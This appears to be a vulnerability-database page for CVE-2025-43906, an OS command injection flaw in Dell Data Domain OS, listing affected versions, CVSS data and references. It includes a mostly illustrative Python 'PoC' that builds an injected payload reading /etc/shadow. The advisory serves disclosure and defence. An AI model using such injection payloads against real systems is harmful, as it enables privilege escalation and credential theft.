CVE-2025-43906

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution. Exploitation may allow privilege escalation to root.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE

Dell DD OS Feature Release 7.7.1.0

Dell DD OS Feature Release < 8.3.0.15

Dell DD OS LTS2025 8.3.1.0

Dell DD OS LTS2024 7.13.1.0 - 7.13.1.30

Dell DD OS LTS2023 7.10.1.0 - 7.10.1.60

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-43906 - Dell PowerProtect Data Domain OS Command Injection PoC
# Note: This vulnerability requires local access with high privileges
# The attacker must already have authenticated access to the DD OS system

#!/usr/bin/env python3
"""
Proof of Concept for CVE-2025-43906
Dell PowerProtect Data Domain DD OS Command Injection
Requires: Local access with high privilege account (e.g., admin or sysadmin)
"""

import subprocess
import sys

# Example: Injecting OS commands through vulnerable input parameters
# In a real scenario, the vulnerable parameter would be identified through
# fuzzing or code review of DD OS command-line interfaces or management scripts

def exploit_dd_os_command_injection(target_input):
    """
    Simulates command injection through a vulnerable DD OS parameter.
    The vulnerable code may pass user input directly to os.system() or subprocess
    without proper sanitization.
    """
    # Vulnerable pattern (for illustration only):
    # os.system("ddadmin command " + user_input)
    
    # Malicious payload example - injecting additional commands
    malicious_payload = target_input + "; id; cat /etc/shadow; whoami"
    
    print(f"[*] Sending payload: {malicious_payload}")
    print(f"[*] If vulnerable, commands after ';' will execute with root privileges")
    
    # In actual exploitation, this would interact with the DD OS CLI or API
    # Example CLI commands that may be vulnerable:
    # - filesys create
    # - adminaccess
    # - net config
    # - Other administrative commands accepting string parameters
    
    return malicious_payload

if __name__ == "__main__":
    if len(sys.argv) > 1:
        payload = sys.argv[1]
    else:
        payload = "normal_input"
    
    result = exploit_dd_os_command_injection(payload)
    print(f"[*] Exploit payload ready: {result}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43906
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43906
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43906/
[4] VulDB https://vuldb.com/cve/CVE-2025-43906
[5] https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43906", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:15:59.687", "lastModified": "2025-10-14T20:12:18.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution. Exploitation may allow privilege escalation to root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}